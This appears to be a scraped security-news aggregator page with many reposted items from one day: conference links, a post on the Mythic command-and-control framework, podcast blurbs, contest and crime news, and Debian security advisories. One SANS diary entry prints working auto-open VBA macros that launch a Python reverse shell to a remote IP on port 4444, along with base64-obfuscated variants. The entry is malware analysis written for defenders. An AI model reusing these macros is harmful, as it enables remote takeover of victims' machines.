Malware Devil

Loading...

Monday, November 9, 2020

DEF CON 28 Safe Mode Ham Radio Village – Swissninja’s ‘The OSTRWERK Initiative’

Many thanks to DEF CON and Conference Speakers for publishing their outstanding presentations; of which, originally appeared at the organization’s DEFCON 28 SAFE MODE Conference, and on the DEF CON YouTube channel. Enjoy!

Permalink

The post DEF CON 28 Safe Mode Ham Radio Village – Swissninja’s ‘The OSTRWERK Initiative’ appeared first on Security Boulevard.

Read More

The post DEF CON 28 Safe Mode Ham Radio Village – Swissninja’s ‘The OSTRWERK Initiative’ appeared first on Malware Devil.



https://malwaredevil.com/2020/11/09/def-con-28-safe-mode-ham-radio-village-swissninjas-the-ostrwerk-initiative/?utm_source=rss&utm_medium=rss&utm_campaign=def-con-28-safe-mode-ham-radio-village-swissninjas-the-ostrwerk-initiative
at No comments:
Labels:

Sharing the Myth

A few months ago, I announced the rebranding of the Apfell framework to Mythic, but the announcements don’t stop there. Over the next few months there will be a series of blogs talking about some of the cool features or agents of Mythic. One of Mythic’s coolest features is the ability to dynamically plug and play new Payload Types or C2 Profiles due to the Docker-ization of every component. The general Mythic services are shown in the traffic flow diagram below:

Mythic tries to be merely a framework in which the operator and developer have complete control over virtually every aspect of their agents. To that end, there should be an easy way for developers to host and manage new Payload Types and C2 Profiles on their own repositories, but still have them hook into Mythic. This has the added benefit of giving payload/C2 developers complete control over the update frequency of their projects without relying on pull requests from the main Mythic repository.

Mythic External Agents

In order to facilitate this process, I released a template repository called Mythic_External_Agent (https://github.com/its-a-feature/Mythic_External_Agent). This repository provides container folders for a Payload Type, C2 Profiles, Agent icons, and corresponding documentation folders.

To leverage this project, simply fork the Mythic_External_Agent repository (or recreate the folder and file structure in your own repository).

The config.json file allows you to customize which components you want to import into your Mythic instance. You might be wondering why you wouldn’t want to just import everything or how things would even work if you didn’t. That’s due to another one of Mythic’s features — your Payload Type and C2 Profile “container” can be Docker, a VM, or any other host.

The Mythic documentation website has instructions on how to turn a VM or a physical host into a Mythic-compatible “container”. This is useful for situations where your agent has very strict requirements for tasking or payload creation that are too much of a hassle (or impossible) to do within Docker. A few examples where this comes to mind:

  • The language or desired output format doesn’t work within Docker
  • Setting up proper toolchains/environments/SDKs to compile to specific OS (such as macOS or specific linux distribution) is impossible or extremely difficult within Linux Docker
  • The compilation requires extra steps with sensitive components that need to be contained to one system (such as developer certs for code signing)
  • You want to free up system resources for compilation or intensive tasks

Installing an External Agent

Mythic includes a special installer script you can run to remotely fetch and install agents. Simply point it to your repository via ./install_agent_from_github.sh https://github.com/path/to/repo and Mythic will clone it down into a temporary directory called temp, parse the config.json to see which folders to copy out to the right locations, then remove the temp folder. At this point, you can do one of two things to get everything up and going:

  • Restart Mythic with sudo ./start_mythic.sh and all of the new Payload Types and C2 Profiles will automatically be pulled in
  • Manually start each Payload Type via sudo ./start_payload_types.sh Agentname and each C2 Profile via sudo ./start_c2_profiles.sh C2Name.

That’s it. All of an agent’s components should now be set up for your Mythic agent.

Mythic Agent Collections

With the external agent capability, developers are able to host their custom agents on any repository that’s git-based (GitHub, BitBucket, GitLab, etc), and are able to do it under their own account. However, this can make it easy to miss agents that exist and lose track of everybody’s amazing work. To help make things easier to find, there is now a MythicAgents organization on GitHub. If you have an agent you would like included with the organization, reach out on Twitter to its_a_feature_ or in the Bloodhound Slack (#mythic channel) and we can get you added. You are still in full control of your agent, but having them in a central group benefits everybody.

The first addition to this collection is Dwight Hohnstein’s Apollo agent.

Apollo is a Windows agent written in C# using the 4.0 .NET Framework designed for SpecterOps training offerings. Be sure to check out Dwight’s upcoming, free SO-CON talk all about Apollo:

If you’re interested in making your own agent, I recommend attending the free SO-CON workshop on how to do it within 2 hours:

Everything for the Hercules agent will be hosted in the MythicAgents organization as well.

Sharing the Myth was originally published in Posts By SpecterOps Team Members on Medium, where people are continuing the conversation by highlighting and responding to this story.

Read More

The post Sharing the Myth appeared first on Malware Devil.



https://malwaredevil.com/2020/11/09/sharing-the-myth/?utm_source=rss&utm_medium=rss&utm_campaign=sharing-the-myth
at No comments:
Labels:

Lock and Code S1Ep19: Forecasting IoT cybersecurity with John Donovan and Adam Kujawa

This week on Lock and Code, we offer something special for listeners—a backstage pass to a cybersecurity training that we held for employees during Cybersecurity Awareness Month, which ended in October.

The topic? The future of cybersecurity for the Internet of Things.

Our guests, Chief Information Security Officer John Donovan and Security Evangelist and a Director for Malwarebytes Labs Adam Kujawa guide us through some of the future’s most pressing questions. Will we ever run antivirus software on IoT devices? What predictions can we make for how the cybersecurity industry will respond to the next, possible big IoT attack? And what can we do today to stay safe?

This episode was recorded live in front of our fellow Malwarebytes employees (over Zoom, of course, as is tradition during the coronavirus pandemic). The episode even includes a Q&A with our employees.

Tune in to get a glimpse into how Malwarebytes helped its own employees during Cybersecurity Awareness Month, on the latest episode of Lock and Code, with host David Ruiz.

You can also find us on the Apple iTunes storeGoogle Play Music, and Spotify, plus whatever preferred podcast platform you use.

We cover our own research on:

Other cybersecurity news

Stay safe, everyone!

The post Lock and Code S1Ep19: Forecasting IoT cybersecurity with John Donovan and Adam Kujawa appeared first on Malwarebytes Labs.

The post Lock and Code S1Ep19: Forecasting IoT cybersecurity with John Donovan and Adam Kujawa appeared first on Malware Devil.



https://malwaredevil.com/2020/11/09/lock-and-code-s1ep19-forecasting-iot-cybersecurity-with-john-donovan-and-adam-kujawa-3/?utm_source=rss&utm_medium=rss&utm_campaign=lock-and-code-s1ep19-forecasting-iot-cybersecurity-with-john-donovan-and-adam-kujawa-3
at No comments:
Labels:

Lock and Code S1Ep19: Forecasting IoT cybersecurity with John Donovan and Adam Kujawa

This week on Lock and Code, we offer something special for listeners–a backstage pass to a cybersecurity training that we held for employees during Cybersecurity Awareness Month, which ended in October.

The topic? The future of cybersecurity for the Internet of Things.

Our guests, Chief Information Security Officer John Donovan and Security Evangelist and a Director for Malwarebytes Labs Adam Kujawa guide us through some of the future’s most pressing questions. Will we ever run antivirus software on IoT devices? What predictions can we make for how the cybersecurity industry will respond to the next, possible big IoT attack? And what can we do today to stay safe?

This episode was recorded live in front of our fellow Malwarebytes employees (over Zoom, of course, as is tradition during the coronavirus pandemic). The episode even includes a Q&A with our employees.

Tune in to get a glimpse into how Malwarebytes helped its own employees during Cybersecurity Awareness Month, on the latest episode of Lock and Code, with host David Ruiz.

You can also find us on the Apple iTunes store, Google Play Music, and Spotify, plus whatever preferred podcast platform you use.

We cover our own research on:

Other cybersecurity news

Stay safe, everyone!

The post Lock and Code S1Ep19: Forecasting IoT cybersecurity with John Donovan and Adam Kujawa appeared first on Malware Devil.



https://malwaredevil.com/2020/11/09/lock-and-code-s1ep19-forecasting-iot-cybersecurity-with-john-donovan-and-adam-kujawa-2/?utm_source=rss&utm_medium=rss&utm_campaign=lock-and-code-s1ep19-forecasting-iot-cybersecurity-with-john-donovan-and-adam-kujawa-2
at No comments:
Labels:

Lock and Code S1Ep19: Forecasting IoT cybersecurity with John Donovan and Adam Kujawa

This week on Lock and Code, we offer something special for listeners–a backstage pass to a cybersecurity training that we held for employees during Cybersecurity Awareness Month, which ended in October.

The topic? The future of cybersecurity for the Internet of Things.

Our guests, Chief Information Security Officer John Donovan and Security Evangelist and a Director for Malwarebytes Labs Adam Kujawa guide us through some of the future’s most pressing questions. Will we ever run antivirus software on IoT devices? What predictions can we make for how the cybersecurity industry will respond to the next, possible big IoT attack? And what can we do today to stay safe?

This episode was recorded live in front of our fellow Malwarebytes employees (over Zoom, of course, as is tradition during the coronavirus pandemic). The episode even includes a Q&A with our employees.

Tune in to get a glimpse into how Malwarebytes helped its own employees during Cybersecurity Awareness Month, on the latest episode of Lock and Code, with host David Ruiz.

You can also find us on the Apple iTunes store, Google Play Music, and Spotify, plus whatever preferred podcast platform you use.

We cover our own research on:

Other cybersecurity news

Stay safe, everyone!

The post Lock and Code S1Ep19: Forecasting IoT cybersecurity with John Donovan and Adam Kujawa appeared first on Malware Devil.



https://malwaredevil.com/2020/11/09/lock-and-code-s1ep19-forecasting-iot-cybersecurity-with-john-donovan-and-adam-kujawa/?utm_source=rss&utm_medium=rss&utm_campaign=lock-and-code-s1ep19-forecasting-iot-cybersecurity-with-john-donovan-and-adam-kujawa
at No comments:
Labels:

The Joy of Tech® ‘Congrats America’

via the Comic Noggins of Nitrozac and Snaggy at The Joy of Tech® !

via the Comic Noggins of Nitrozac and Snaggy at The Joy of Tech®!

Permalink

The post The Joy of Tech® ‘Congrats America’ appeared first on Security Boulevard.

Read More

The post The Joy of Tech® ‘Congrats America’ appeared first on Malware Devil.



https://malwaredevil.com/2020/11/09/the-joy-of-tech-congrats-america/?utm_source=rss&utm_medium=rss&utm_campaign=the-joy-of-tech-congrats-america
at No comments:
Labels:

5 Reasons Why Web Security Is Important to Avoid Ransomware

In the world of IT security in general, 2020 so far could be called the year of ransomware. The news is full of reports of new ransomware attacks and based on the trends so far, we can expect the situation to keep getting worse. Many…

Read more

The post 5 Reasons Why Web Security Is Important to Avoid Ransomware appeared first on Acunetix.

The post 5 Reasons Why Web Security Is Important to Avoid Ransomware appeared first on Security Boulevard.

Read More

The post 5 Reasons Why Web Security Is Important to Avoid Ransomware appeared first on Malware Devil.



https://malwaredevil.com/2020/11/09/5-reasons-why-web-security-is-important-to-avoid-ransomware/?utm_source=rss&utm_medium=rss&utm_campaign=5-reasons-why-web-security-is-important-to-avoid-ransomware
at No comments:
Labels:

Using Cloud Costs to Find Your Crown Jewels

cloud

Looking at overall cloud spend can be a common measurement for comparison when determining where your crown jewels data reside The first step to securing your infrastructure is understanding what assets need to be secured. Data classification is the process of organizing data into categories so it is simple to identify, store, retrieve and protect…

The post Using Cloud Costs to Find Your Crown Jewels appeared first on Security Boulevard.

Read More

The post Using Cloud Costs to Find Your Crown Jewels appeared first on Malware Devil.



https://malwaredevil.com/2020/11/09/using-cloud-costs-to-find-your-crown-jewels/?utm_source=rss&utm_medium=rss&utm_campaign=using-cloud-costs-to-find-your-crown-jewels
at No comments:
Labels:

Windows 10, iOS, Chrome, Firefox and Others Hacked at Tianfu Cup Competition

Multiple software products from Adobe, Apple, Google, Microsoft, Mozilla, and Samsung were successfully pwned with previously unseen exploits in Tianfu Cup 2020, the third edition of the international cybersecurity contest held in the city of Chengdu, China.
“Many mature and hard targets have been pwned on this year’s contest,” the event organizers said. “11 out of 16 targets cracked with 23
Read More

The post Windows 10, iOS, Chrome, Firefox and Others Hacked at Tianfu Cup Competition appeared first on Malware Devil.



https://malwaredevil.com/2020/11/09/windows-10-ios-chrome-firefox-and-others-hacked-at-tianfu-cup-competition-2/?utm_source=rss&utm_medium=rss&utm_campaign=windows-10-ios-chrome-firefox-and-others-hacked-at-tianfu-cup-competition-2
at No comments:
Labels:

Windows 10, iOS, Chrome, Firefox and Others Hacked at Tianfu Cup Competition

Multiple software products from Adobe, Apple, Google, Microsoft, Mozilla, and Samsung were successfully pwned with previously unseen exploits in Tianfu Cup 2020, the third edition of the international cybersecurity contest held in the city of Chengdu, China.
“Many mature and hard targets have been pwned on this year’s contest,” the event organizers said. “11 out of 16 targets cracked with 23
Read More

The post Windows 10, iOS, Chrome, Firefox and Others Hacked at Tianfu Cup Competition appeared first on Malware Devil.



https://malwaredevil.com/2020/11/09/windows-10-ios-chrome-firefox-and-others-hacked-at-tianfu-cup-competition/?utm_source=rss&utm_medium=rss&utm_campaign=windows-10-ios-chrome-firefox-and-others-hacked-at-tianfu-cup-competition
at No comments:
Labels:

The Limitations of SASE and Zero Trust

While SASE and Zero Trust work well for applications where it’s easy to identify valid users, these frameworks fail to address two specific areas of concern.

The post The Limitations of SASE and Zero Trust appeared first on K2io.

The post The Limitations of SASE and Zero Trust appeared first on Security Boulevard.

Read More

The post The Limitations of SASE and Zero Trust appeared first on Malware Devil.



https://malwaredevil.com/2020/11/09/the-limitations-of-sase-and-zero-trust/?utm_source=rss&utm_medium=rss&utm_campaign=the-limitations-of-sase-and-zero-trust
at No comments:
Labels:

How Attackers Brush Up Their Malicious Scripts, (Mon, Nov 9th)

On Friday, I received a bunch of alerts from one of my YARA hunting rules. Several samples were submitted from the same account (through the VT API), from the same country (US), and in a very short period of time. All the submitted files were OLE2 files containing a malicious macro. All of them had a low VT score so it deserved some investigations. I downloaded the samples and had a look at them.

Indeed all OLE2 files contained the same main() macro:

sub Autoexec()
    Call Main
End Sub

Sub Auto_Open()
    Call Main
End Sub

Sub AutoOpen()
    Call Main
End Sub

Sub Workbook_Open()
    Call Main
End Sub

I extracted the VBA code via oledump and reviewed them chronologically (based on the upload time on VT). Here is the first version of the macro:

Private Sub Main()
  Shell ("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((""192.168.64.36"",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([""/bin/bash"",""-i""]);'")
End Sub

Nothing fancy, a simple macro based on a /bin/bash backdoor. The presence of Python code and the bash shell indicates that the macro is used in a targeted attack. Same remark for the RFC1918 IP address. The used port (4444) indicates probably the use of a Kali host by the attacker.

Then, the attacker added a notification popup (for debugging purposes?):

Private Sub Main()
    Shell ("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((""192.168.64.36"",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([""/bin/bash"",""-i""]);'")
    Shell ("osascript -e 'display notification ""Macro execut<8e>e"" with title ""Microsoft Word"" '")
End Sub

‘osascript’ is a macOS tool that allows executing OSA scripts (AppleScript, JavaScript, etc.)[1]. We learned something new about the target: it uses a macOS device and the attacker speaks in French. We have this string in the OLE2 file:

Attribute VB_Name = “Feuil1” (“Feuille” means “Sheet”)

Also, the displayed notification is in French/

Then the attacker another technique and tried to store the payload into the document comments:

Private Sub Main()
    Dim sc As String
    sc = ActiveDocument.BuiltInDocumentProperties("comments").Value
    Shell (sc)
End Sub

The next step was to obfuscate the payload by reversing the code and encoding in in Base64: 

Private Sub Main()
    Dim sc As String
    sc = ActiveDocument.BuiltInDocumentProperties("comments").Value
    sc = Right(sc, Len(sc) - 10)
    Shell ("echo """ & sc & """|rev|base64 -D|bash")
End Sub

Another version of the same technique:

Private Sub Main()
    Dim sc As String
    sc = ActiveDocument.BuiltInDocumentProperties("comments").Value
    Shell ("echo """ & sc & """|rev|base64 -D|bash")
End Sub

The next one is funnier: the attacker used the text2speech capabilities of macOS using the ‘say’ command. 

Private Sub Main()
    Shell ("echo ""KEDI5F2c""|rev|base64 -D|bash")
    Shell ("osascript -e 'display notification ""Macro execut<8e>e"" with title ""Microsoft Word"" '")
End Sub

And finally the latest version found with the Base64 data directly available in the macro:

Private Sub Main()
    Shell ("echo ""gCnsTKdJSatICLig2chJ2LulmYvIyWowGbhNmLzNXZj9mcwJWdz1Dc7kiMskCKv5WZslmZuMHKyAXdk5ycvByOpEDLpgybuVGbpZmLzhiMwVHZuM3bgsTKwwSKo8mblxWam5ycoIDc1RmLz92OpkCN0QDNsIiNz4CN24CO2EjLykTMigCK0NWZu52bj5yc7kSTBVkUUN1XLN0TT5Cdlt2YvNHLUVkTJ9lRB5Cdlt2YvNHK0V2aj92cuQXZrN2bz1zc7M3bsM3clN2byBnY1NHL0V2aj92cgQncvBXbpdCIj1CIu9Ga0lHc""|rev|base64 -D|bash")
    Shell ("osascript -e 'display notification ""Macro execut<8e>e"" with title ""Microsoft Word"" '")
End Sub

Note the Base64 data contains the same Python code as seen in the first version.

Based on all those findings, we can probably conclude that the attacker is preparing a macro to compromise a macOS user. Another red-team exercise on its way?

[1] https://osxdaily.com/2016/08/19/run-applescript-command-line-macos-osascript/

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. Read More

The post How Attackers Brush Up Their Malicious Scripts, (Mon, Nov 9th) appeared first on Malware Devil.



https://malwaredevil.com/2020/11/09/how-attackers-brush-up-their-malicious-scripts-mon-nov-9th/?utm_source=rss&utm_medium=rss&utm_campaign=how-attackers-brush-up-their-malicious-scripts-mon-nov-9th
at No comments:
Labels:

3 Takeaways from Sandworm Hacker Group’s Indictment 

Sandworm

The U.S.Department of Justice officially revealed in October what it said were a number of instances of Russian government-sponsored hacking when it formally indicated six members and officers in Russia’s military agency Russian Main Intelligence Directorate (GRU). In addition to naming the members of the hacker group, it was also the first time the U.S…

The post 3 Takeaways from Sandworm Hacker Group’s Indictment  appeared first on Security Boulevard.

Read More

The post 3 Takeaways from Sandworm Hacker Group’s Indictment  appeared first on Malware Devil.



https://malwaredevil.com/2020/11/09/3-takeaways-from-sandworm-hacker-groups-indictment/?utm_source=rss&utm_medium=rss&utm_campaign=3-takeaways-from-sandworm-hacker-groups-indictment
at No comments:
Labels:

Body Found in Canada Identified as Neo-Nazi Spam King

The body of a man found shot inside a burned out vehicle in Canada three years ago has been identified as that of Davis Wolfgang Hawke, a prolific spammer and neo-Nazi who led a failed anti-government march on Washington, D.C. in 1999, according to news reports.

The post Body Found in Canada Identified as Neo-Nazi Spam King appeared first on Security Boulevard.

Read More

The post Body Found in Canada Identified as Neo-Nazi Spam King appeared first on Malware Devil.



https://malwaredevil.com/2020/11/09/body-found-in-canada-identified-as-neo-nazi-spam-king-2/?utm_source=rss&utm_medium=rss&utm_campaign=body-found-in-canada-identified-as-neo-nazi-spam-king-2
at No comments:
Labels:

Body Found in Canada Identified as Neo-Nazi Spam King

The body of a man found shot inside a burned out vehicle in Canada three years ago has been identified as that of Davis Wolfgang Hawke, a prolific spammer and neo-Nazi who led a failed anti-government march on Washington, D.C. in 1999, according to news reports.

Homicide detectives said they originally thought the man found June 14, 2017 in a torched SUV on a logging road in Squamish, British Columbia was a local rock climber known to others in the area as a politically progressive vegan named Jesse James.

Davis Wolfgang Hawke. Image: Spam Kings, by Brian McWilliams.

But according to a report from CTV News, at a press conference late last month authorities said new DNA evidence linked to a missing persons investigation has confirmed the man’s true identity as Davis Wolfgang Hawke.

A key subject of the book Spam Kings by Brian McWilliams, Hawke was a Jewish-born American who’d legally changed his name from Andrew Britt Greenbaum. For many years, Hawke was a big time purveyor of spam emails hawking pornography and male enhancement supplements, such as herbal Viagra.

Hawke had reportedly bragged about the money he earned from spam, but told friends he didn’t trust banks and decided to convert his earnings into gold and platinum bars. That sparked rumors that he had possibly buried his ill-gotten gains on his parents’ Massachusetts property.

In 2005, AOL won a $12.8 million lawsuit against him for relentlessly spamming its users. A year later, AOL won a court judgment authorizing them to dig on that property, although no precious metals were ever found.

More recently, Hawke’s Jesse James identity penned a book called Psychology of Seduction, which claimed to merge the “shady world of the pickup artist with modern science, unraveling the mystery of attraction using evolutionary biology and examining seduction through the lens of social and evolutionary psychology.”

The book’s “about the author” page said James was a “disruptive technology pioneer” who was into rock climbing and was a resident of Squamish. It also claimed James held a PhD in theoretical physics from Stanford, and that he was an officer in the Israeli Defense Force.

It might be difficult to fathom why, but Hawke may have made a few enemies over the years. Spam Kings author McWilliams notes that Hawke changed his name with regularity and used many pseudonyms.

“I could definitely see this guy making someone so mad at him they’d want to kill him,” McWilliams told CTV. “He was a guy who really pushed people that way and was a crook. I mean, he was a conman. That was what he was and I can see how somebody might get mad. I can also see him staging his own death or committing suicide in a fashion like that, if that’s what he chose to do. He was just a perplexing guy. I still don’t feel like I have a handle on him and I spent the better part of a year trying to figure out what made him tick.”

The father of the deceased, Hy Greenbaum, has offered a $10,000 reward to any tipster who can help solve his son’s homicide. British Columbia’s Integrated Homicide Investigation Team also is seeking clues, and can be reached at ihitinfo@rcmp-grc.gc.ca.

Read More

The post Body Found in Canada Identified as Neo-Nazi Spam King appeared first on Malware Devil.



https://malwaredevil.com/2020/11/09/body-found-in-canada-identified-as-neo-nazi-spam-king/?utm_source=rss&utm_medium=rss&utm_campaign=body-found-in-canada-identified-as-neo-nazi-spam-king
at No comments:
Labels:

Creando presupuestos para ciberseguridad efectivos

Construir una organización eficaz y resistente con un presupuesto limitado es una gran hazaña. Cuando se trata de presupuestos de ciberseguridad, hay muchos aspectos que deben considerarse. Afortunadamente, la alineación con las mejores prácticas de la industria y los marcos de seguridad agregan un poco de claridad a este desafío. Al presentar el webcast “¡Todo […]… Read More

The post Creando presupuestos para ciberseguridad efectivos appeared first on The State of Security.

The post Creando presupuestos para ciberseguridad efectivos appeared first on Security Boulevard.

Read More

The post Creando presupuestos para ciberseguridad efectivos appeared first on Malware Devil.



https://malwaredevil.com/2020/11/09/creando-presupuestos-para-ciberseguridad-efectivos/?utm_source=rss&utm_medium=rss&utm_campaign=creando-presupuestos-para-ciberseguridad-efectivos
at No comments:
Labels:

CISA Strategy for 5G Security and Resilience

In August 2020, the Cybersecurity and Infrastructure Security Agency (CISA) released its strategy to ensure the security and resilience of 5G infrastructure in the United States. Roughly every 10 years, the next generation of mobile communication networks is released, bringing faster speeds and increased capabilities. The fifth generation (5G) of wireless technology is a complete […]… Read More

The post CISA Strategy for 5G Security and Resilience appeared first on The State of Security.

The post CISA Strategy for 5G Security and Resilience appeared first on Security Boulevard.

Read More

The post CISA Strategy for 5G Security and Resilience appeared first on Malware Devil.



https://malwaredevil.com/2020/11/09/cisa-strategy-for-5g-security-and-resilience/?utm_source=rss&utm_medium=rss&utm_campaign=cisa-strategy-for-5g-security-and-resilience
at No comments:
Labels:

ISC Stormcast For Monday, November 9th 2020 https://isc.sans.edu/podcastdetail.html?id=7244, (Mon, Nov 9th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. Read More

The post ISC Stormcast For Monday, November 9th 2020 https://isc.sans.edu/podcastdetail.html?id=7244, (Mon, Nov 9th) appeared first on Malware Devil.



https://malwaredevil.com/2020/11/09/isc-stormcast-for-monday-november-9th-2020-https-isc-sans-edu-podcastdetail-htmlid7244-mon-nov-9th/?utm_source=rss&utm_medium=rss&utm_campaign=isc-stormcast-for-monday-november-9th-2020-https-isc-sans-edu-podcastdetail-htmlid7244-mon-nov-9th
at No comments:
Labels:

ESB-2020.3939 – [Debian] libexif: Execute arbitrary code/commands – Remote with user interaction 

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2020.3939
                          libexif security update
                              9 November 2020

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           libexif
Publisher:         Debian
Operating System:  Debian GNU/Linux
Impact/Access:     Execute Arbitrary Code/Commands -- Remote with User Interaction
Resolution:        Patch/Upgrade
CVE Names:         CVE-2020-0452  

Reference:         ESB-2020.3934

Original Bulletin: 
   http://www.debian.org/security/2020/dsa-4786

- --------------------------BEGIN INCLUDED TEXT--------------------

- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

- - -------------------------------------------------------------------------
Debian Security Advisory DSA-4786-1                   security@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
November 08, 2020                     https://www.debian.org/security/faq
- - -------------------------------------------------------------------------

Package        : libexif
CVE ID         : CVE-2020-0452

It was discovered that a boundary check in libexif, a library to parse
EXIF files, could be optimised away by the compiler, resulting in
a potential buffer overflow.

For the stable distribution (buster), this problem has been fixed in
version 0.6.21-5.1+deb10u5.

We recommend that you upgrade your libexif packages.

For the detailed security status of libexif please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/libexif

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org
- -----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAl+oCFAACgkQEMKTtsN8
TjawTBAAvQ/VB+0Nlbd9plOAUFtse3jrtgALiAczERsAntbBUOQweblDS/xK21Ng
qlMaNpPspmMcbsLu+3kwKs8rO2sG5i50DkfyXYwshVENLLgG7jbvJ/LH1XLLKzPe
yazeKybNaH7zqiONr3q+45av8+dPeLjsjJjY9Up8wKM9Fkyh6VZqkgd14ixzTP4A
/qPl9cU1oz+XrAz9kml85Xbq61IiM+7fRJv2yUimYkWxPGHJf2xPp0o55KPPz6x9
Yl4EwAjU7AsAhc+BEKAx8xIFsEYdtq3Ym3EXd5UTQSIi9K2WqM+TbuLKFeWkysdF
YRz2yifQhIg4NRMMMKXP5JV/P6Kma91LvqHbU1ZN70V0Ts9SClZAvQene9npCuFa
fc98/KcilRofhpdKfPFMwf5LaNrytJcC9ue8enM+Xj/iLDM2S6AwNzEZAKv/liYP
hdAVbK9QETcobUe0jrLEubbmUqezMEl1s6GgqljqJOVkz1LHZZK/YvSUnhsXxkqA
MTqKuM7mJVbJsDEvgFa3BdGJuH1E4ya6x+TwJFw4DmJ+acXHZ+0k4/iuZwK/QloN
x26jdr25WjwRqp/vmTcxTYp5Sxl2zv3BRLh+EJasBbB58pIxYPAQzLnEIA8KmiGJ
SyNR3qoSPcN5kchT+IkS673zPFRGosyOYaDxKn2Z4a2bGnoMuVo=
=Yb9P
- -----END PGP SIGNATURE-----

- --------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members.  As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin.  It may
not be updated when updates to the original are made.  If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above.  If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

        https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBX6jJYuNLKJtyKPYoAQigQw/+PwG4oEAlH9ux+uF3umO30E6qNf4T4/qy
eiEP5786mXhRAnTKrhob6wwehd+fyBaJKq841JZtMl/nQA7+prT4dWXOuIVHwwLs
YA80BuXpJx95wodOyiERiP1H3nEimFFaLSqPiU/ZfZzg3hYUY8OXvdV+JHzt+EtA
YInM9ky6PMUxbaPl/EVPRx8klf58pM4vh5y5ewSzJOPqXTRRW8ndbnoPLiMST9rY
G5WBiEl2fxdTg8Q0xPtXZZNgh19exRT2Om4ntmuKH1ig5SCfb5mRpREpEfKt/OLp
wqAEiDsMTiDigdL6ROe9V3pMzEkFDc7JJF3QD4L4bhj25MBEQUDKe3djZMz8TbFP
6Ar5ZLE5NTglbKL5Kl0/shmlyh5A4J/40zJ6rdKiwQkN0zQJTFrs73JNUyAZMbt2
wjf7Oe47lrKCmJlNe3Ko9yI8xZ30amJE/3krT7tgZPr4ztxL2XHWZjrVmu1gXLUm
5hnc8L58LhKdwdvP3HnmcXqH+LDljqdi16zYTIbD7BR0WIXB0FvbJZ/ukS0tUF4n
PDW80FEUOLhB9vBr3KvDvW6C035wA+zxbMjJc4zsStr4t648efFCZ6XoQ/iMbIoA
O47OG4MSKxhKdIUD3CXxSmjHLYMjSvgLsXQvEhxuM/pN7Ip/lOtgvjeKFDIUBEHD
nUOeUkapC7I=
=ICdB
-----END PGP SIGNATURE-----

Read More

The post ESB-2020.3939 – [Debian] libexif: Execute arbitrary code/commands – Remote with user interaction appeared first on Malware Devil.



https://malwaredevil.com/2020/11/09/esb-2020-3939-debian-libexif-execute-arbitrary-code-commands-remote-with-user-interaction/?utm_source=rss&utm_medium=rss&utm_campaign=esb-2020-3939-debian-libexif-execute-arbitrary-code-commands-remote-with-user-interaction
at No comments:
Labels:

ESB-2020.3938 – [Debian] wordpress: Multiple vulnerabilities 

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2020.3938
                         wordpress security update
                              9 November 2020

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           wordpress
Publisher:         Debian
Operating System:  Debian GNU/Linux
Impact/Access:     Execute Arbitrary Code/Commands -- Remote/Unauthenticated      
                   Increased Privileges            -- Remote/Unauthenticated      
                   Cross-site Request Forgery      -- Remote with User Interaction
                   Denial of Service               -- Remote/Unauthenticated      
                   Cross-site Scripting            -- Remote with User Interaction
Resolution:        Patch/Upgrade
CVE Names:         CVE-2020-28040 CVE-2020-28039 CVE-2020-28038
                   CVE-2020-28037 CVE-2020-28036 CVE-2020-28035
                   CVE-2020-28034 CVE-2020-28033 CVE-2020-28032

Reference:         ESB-2020.3789

Original Bulletin: 
   http://www.debian.org/security/2020/dsa-4784

- --------------------------BEGIN INCLUDED TEXT--------------------

- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

- - -------------------------------------------------------------------------
Debian Security Advisory DSA-4784-1                   security@debian.org
https://www.debian.org/security/                       Sebastien Delafond
November 06, 2020                     https://www.debian.org/security/faq
- - -------------------------------------------------------------------------

Package        : wordpress
CVE ID         : CVE-2020-28032 CVE-2020-28033 CVE-2020-28034 CVE-2020-28035 
